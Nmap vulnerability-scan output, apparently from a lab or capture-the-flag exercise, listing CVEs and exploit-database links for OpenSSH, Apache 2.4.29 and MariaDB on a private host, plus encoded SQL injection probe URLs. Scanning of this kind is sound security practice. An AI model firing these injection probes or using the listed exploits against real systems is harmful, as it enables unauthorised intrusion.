| MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2019-6111/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/ALPINE-LINUX-CVE-2019-6111/ 5.8 https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2019-6111/ *EXPLOIT*
|
||||||
|
| EXPLOITPACK:98FE96309F9524B8C84C508837551A19 5.8 https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19 *EXPLOIT*
|
||||||
|
| EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 5.8 https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 *EXPLOIT*
|
||||||
|
| EDB-ID:46516 5.8 https://vulners.com/exploitdb/EDB-ID:46516 *EXPLOIT*
|
||||||
|
| EDB-ID:46193 5.8 https://vulners.com/exploitdb/EDB-ID:46193 *EXPLOIT*
|
||||||
|
| CVE-2019-6111 5.8 https://vulners.com/cve/CVE-2019-6111
|
||||||
|
| 1337DAY-ID-32328 5.8 https://vulners.com/zdt/1337DAY-ID-32328 *EXPLOIT*
|
||||||
|
| 1337DAY-ID-32009 5.8 https://vulners.com/zdt/1337DAY-ID-32009 *EXPLOIT*
|
||||||
|
| SSH_ENUM 5.0 https://vulners.com/canvas/SSH_ENUM *EXPLOIT*
|
||||||
|
| PACKETSTORM:150621 5.0 https://vulners.com/packetstorm/PACKETSTORM:150621 *EXPLOIT*
|
||||||
|
| MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS 5.0 https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS *EXPLOIT*
|
||||||
|
| EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 5.0 https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 *EXPLOIT*
|
||||||
|
| EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 5.0 https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 *EXPLOIT*
|
||||||
|
| EDB-ID:45939 5.0 https://vulners.com/exploitdb/EDB-ID:45939 *EXPLOIT*
|
||||||
|
| EDB-ID:45233 5.0 https://vulners.com/exploitdb/EDB-ID:45233 *EXPLOIT*
|
||||||
|
| CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
|
||||||
|
| CVE-2018-15473 5.0 https://vulners.com/cve/CVE-2018-15473
|
||||||
|
| 1337DAY-ID-31730 5.0 https://vulners.com/zdt/1337DAY-ID-31730 *EXPLOIT*
|
||||||
|
| CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617
|
||||||
|
| MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/ *EXPLOIT*
|
||||||
|
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
|
||||||
|
| CVE-2019-6110 4.0 https://vulners.com/cve/CVE-2019-6110
|
||||||
|
| CVE-2019-6109 4.0 https://vulners.com/cve/CVE-2019-6109
|
||||||
|
| CVE-2018-20685 2.6 https://vulners.com/cve/CVE-2018-20685
|
||||||
|
| PACKETSTORM:151227 0.0 https://vulners.com/packetstorm/PACKETSTORM:151227 *EXPLOIT*
|
||||||
|
|_ 1337DAY-ID-30937 0.0 https://vulners.com/zdt/1337DAY-ID-30937 *EXPLOIT*
|
||||||
|
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
|
||||||
|
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|
||||||
|
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|
||||||
|
|_http-dombased-xss: Couldn't find any DOM based XSS.
|
||||||
|
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|
||||||
|
| vulners:
|
||||||
|
| cpe:/a:apache:http_server:2.4.29:
|
||||||
|
| CVE-2021-44790 7.5 https://vulners.com/cve/CVE-2021-44790
|
||||||
|
| CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275
|
||||||
|
| CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691
|
||||||
|
| MSF:ILITIES/REDHAT_LINUX-CVE-2019-0211/ 7.2 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-0211/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0211/ 7.2 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0211/ *EXPLOIT*
|
||||||
|
| EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB 7.2 https://vulners.com/exploitpack/EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB *EXPLOIT*
|
||||||
|
| EDB-ID:46676 7.2 https://vulners.com/exploitdb/EDB-ID:46676 *EXPLOIT*
|
||||||
|
| CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211
|
||||||
|
| 1337DAY-ID-32502 7.2 https://vulners.com/zdt/1337DAY-ID-32502 *EXPLOIT*
|
||||||
|
| MSF:ILITIES/UBUNTU-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1312/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/UBUNTU-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2017-15715/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/SUSE-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2017-15715/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/REDHAT_LINUX-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2017-15715/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/ORACLE_LINUX-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/ORACLE_LINUX-CVE-2017-15715/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15715/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15715/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15715/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15715/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2017-15715/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/FREEBSD-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/FREEBSD-CVE-2017-15715/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/DEBIAN-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2017-15715/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/CENTOS_LINUX-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2017-15715/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/APACHE-HTTPD-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2017-15715/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/AMAZON_LINUX-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/AMAZON_LINUX-CVE-2017-15715/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/ALPINE-LINUX-CVE-2017-15715/ 6.8 https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2017-15715/ *EXPLOIT*
|
||||||
|
| FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 6.8 https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 *EXPLOIT*
|
||||||
|
| CVE-2021-40438 6.8 https://vulners.com/cve/CVE-2021-40438
|
||||||
|
| CVE-2020-35452 6.8 https://vulners.com/cve/CVE-2020-35452
|
||||||
|
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
|
||||||
|
| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
|
||||||
|
| 4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 6.8 https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 *EXPLOIT*
|
||||||
|
| CVE-2021-44224 6.4 https://vulners.com/cve/CVE-2021-44224
|
||||||
|
| CVE-2019-10082 6.4 https://vulners.com/cve/CVE-2019-10082
|
||||||
|
| MSF:ILITIES/REDHAT_LINUX-CVE-2019-0217/ 6.0 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-0217/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0217/ 6.0 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0217/ *EXPLOIT*
|
||||||
|
| CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217
|
||||||
|
| CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927
|
||||||
|
| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
|
||||||
|
| 1337DAY-ID-33577 5.8 https://vulners.com/zdt/1337DAY-ID-33577 *EXPLOIT*
|
||||||
|
| MSF:ILITIES/UBUNTU-CVE-2018-1333/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1333/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/UBUNTU-CVE-2018-1303/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1303/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/UBUNTU-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2017-15710/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/REDHAT_LINUX-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2020-9490/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/ORACLE_LINUX-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/ORACLE_LINUX-CVE-2020-9490/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1934/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1934/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15710/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15710/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-9490/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-9490/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15710/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15710/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/FREEBSD-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/FREEBSD-CVE-2020-9490/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/CENTOS_LINUX-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2020-9490/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/CENTOS_LINUX-CVE-2017-15710/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2017-15710/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/APACHE-HTTPD-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2020-9490/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2020-9490/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2020-9490/ *EXPLOIT*
|
||||||
|
| CVE-2021-34798 5.0 https://vulners.com/cve/CVE-2021-34798
|
||||||
|
| CVE-2021-33193 5.0 https://vulners.com/cve/CVE-2021-33193
|
||||||
|
| CVE-2021-26690 5.0 https://vulners.com/cve/CVE-2021-26690
|
||||||
|
| CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490
|
||||||
|
| CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934
|
||||||
|
| CVE-2019-17567 5.0 https://vulners.com/cve/CVE-2019-17567
|
||||||
|
| CVE-2019-10081 5.0 https://vulners.com/cve/CVE-2019-10081
|
||||||
|
| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
|
||||||
|
| CVE-2019-0196 5.0 https://vulners.com/cve/CVE-2019-0196
|
||||||
|
| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
|
||||||
|
| CVE-2018-17189 5.0 https://vulners.com/cve/CVE-2018-17189
|
||||||
|
| CVE-2018-1333 5.0 https://vulners.com/cve/CVE-2018-1333
|
||||||
|
| CVE-2018-1303 5.0 https://vulners.com/cve/CVE-2018-1303
|
||||||
|
| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
|
||||||
|
| MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-0197/ 4.9 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-0197/ *EXPLOIT*
|
||||||
|
| CVE-2019-0197 4.9 https://vulners.com/cve/CVE-2019-0197
|
||||||
|
| MSF:ILITIES/UBUNTU-CVE-2018-1302/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1302/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/UBUNTU-CVE-2018-1301/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1301/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/REDHAT_LINUX-CVE-2020-11993/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2020-11993/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-11993/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-11993/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/DEBIAN-CVE-2019-10092/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2019-10092/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/CENTOS_LINUX-CVE-2020-11993/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2020-11993/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/APACHE-HTTPD-CVE-2020-11993/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2020-11993/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/APACHE-HTTPD-CVE-2019-10092/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2019-10092/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2020-11993/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2020-11993/ *EXPLOIT*
|
||||||
|
| CVE-2020-11993 4.3 https://vulners.com/cve/CVE-2020-11993
|
||||||
|
| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
|
||||||
|
| CVE-2018-1302 4.3 https://vulners.com/cve/CVE-2018-1302
|
||||||
|
| CVE-2018-1301 4.3 https://vulners.com/cve/CVE-2018-1301
|
||||||
|
| CVE-2018-11763 4.3 https://vulners.com/cve/CVE-2018-11763
|
||||||
|
| 4013EC74-B3C1-5D95-938A-54197A58586D 4.3 https://vulners.com/githubexploit/4013EC74-B3C1-5D95-938A-54197A58586D *EXPLOIT*
|
||||||
|
| 1337DAY-ID-35422 4.3 https://vulners.com/zdt/1337DAY-ID-35422 *EXPLOIT*
|
||||||
|
| 1337DAY-ID-33575 4.3 https://vulners.com/zdt/1337DAY-ID-33575 *EXPLOIT*
|
||||||
|
| MSF:ILITIES/UBUNTU-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1283/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/REDHAT_LINUX-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2018-1283/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/ORACLE-SOLARIS-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2018-1283/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/IBM-HTTP_SERVER-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2018-1283/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1283/ *EXPLOIT*
|
||||||
|
| MSF:ILITIES/CENTOS_LINUX-CVE-2018-1283/ 3.5 https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2018-1283/ *EXPLOIT*
|
||||||
|
| CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
|
||||||
|
| PACKETSTORM:152441 0.0 https://vulners.com/packetstorm/PACKETSTORM:152441 *EXPLOIT*
|
||||||
|
| MSF:EXPLOIT/UNIX/WEBAPP/JOOMLA_MEDIA_UPLOAD_EXEC/ 0.0 https://vulners.com/metasploit/MSF:EXPLOIT/UNIX/WEBAPP/JOOMLA_MEDIA_UPLOAD_EXEC/ *EXPLOIT*
|
||||||
|
| 1337DAY-ID-663 0.0 https://vulners.com/zdt/1337DAY-ID-663 *EXPLOIT*
|
||||||
|
| 1337DAY-ID-601 0.0 https://vulners.com/zdt/1337DAY-ID-601 *EXPLOIT*
|
||||||
|
| 1337DAY-ID-4533 0.0 https://vulners.com/zdt/1337DAY-ID-4533 *EXPLOIT*
|
||||||
|
| 1337DAY-ID-3109 0.0 https://vulners.com/zdt/1337DAY-ID-3109 *EXPLOIT*
|
||||||
|
|_ 1337DAY-ID-2237 0.0 https://vulners.com/zdt/1337DAY-ID-2237 *EXPLOIT*
|
||||||
|
|_http-server-header: Apache/2.4.29 (Ubuntu)
|
||||||
|
| http-sql-injection:
|
||||||
|
| Possible sqli for queries:
|
||||||
|
| http://10.10.160.69:80/assets/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|
||||||
|
| http://10.10.160.69:80/assets/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|
||||||
|
| http://10.10.160.69:80/assets/js/?C=N%3BO%3DD%27%20OR%20sqlspider
|
||||||
|
| http://10.10.160.69:80/assets/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|
||||||
|
| http://10.10.160.69:80/assets/js/?C=D%3BO%3DD%27%20OR%20sqlspider
|
||||||
|
| http://10.10.160.69:80/assets/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|
||||||
|
| http://10.10.160.69:80/assets/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|
||||||
|
| http://10.10.160.69:80/assets/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|
||||||
|
| http://10.10.160.69:80/assets/?C=S%3BO%3DA%27%20OR%20sqlspider
|
||||||
|
| http://10.10.160.69:80/assets/?C=N%3BO%3DD%27%20OR%20sqlspider
|
||||||
|
| http://10.10.160.69:80/assets/?C=M%3BO%3DA%27%20OR%20sqlspider
|
||||||
|
| http://10.10.160.69:80/assets/?C=D%3BO%3DA%27%20OR%20sqlspider
|
||||||
|
| http://10.10.160.69:80/assets/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|
||||||
|
| http://10.10.160.69:80/assets/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|
||||||
|
| http://10.10.160.69:80/assets/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|
||||||
|
| http://10.10.160.69:80/assets/js/?C=M%3BO%3DD%27%20OR%20sqlspider
|
||||||
|
| http://10.10.160.69:80/assets/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|
||||||
|
| http://10.10.160.69:80/assets/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|
||||||
|
| http://10.10.160.69:80/assets/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|
||||||
|
|_ http://10.10.160.69:80/assets/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|
||||||
|
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|
||||||
|
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|
||||||
|
3306/tcp open mysql syn-ack ttl 63 MySQL 5.5.5-10.1.48-MariaDB-0ubuntu0.18.04.1
|
||||||
|
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
|
||||||
|
| vulners:
|
||||||
|
| MySQL 5.5.5-10.1.48-MariaDB-0ubuntu0.18.04.1:
|
||||||
|
|_ NODEJS:602 0.0 https://vulners.com/nodejs/NODEJS:602
|
||||||
|
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
||||||
|
|
||||||
|
Read data files from: /usr/bin/../share/nmap
|
||||||
|
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||||||
|
# Nmap done at Sun Jan 16 00:16:48 2022 -- 1 IP address (1 host up) scanned in 58.58 seconds
|
File diff suppressed because one or more lines are too long
Loading…
Reference in New Issue